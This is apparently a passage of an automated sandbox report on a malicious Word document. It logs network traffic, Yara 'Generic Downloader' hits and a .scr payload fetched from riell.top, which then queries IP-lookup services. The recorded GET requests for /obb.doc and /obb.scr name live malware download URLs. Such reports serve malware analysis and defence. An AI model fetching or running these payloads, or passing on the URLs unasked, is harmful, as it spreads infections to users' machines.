            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168

            Networking

            barindex
            Yara detected Generic Downloader
            Source: Yara matchFile source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: checkip.dyndns.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\AppData\Roaming\obi23456.scrDNS query: name: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /obb.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: riell.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /obb.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: riell.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49162 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49170 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49171 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FFDE4C25-701B-4F27-93CB-2693CC173C87}.tmpJump to behavior
            Source: global trafficHTTP traffic detected: GET /obb.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: riell.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /obb.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: riell.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: riell.top
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002497000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: obi23456.scr, 0000000A.00000002.897811172.00000000023EA000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002497000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: obi23456.scr, 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: obi23456.scr, 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
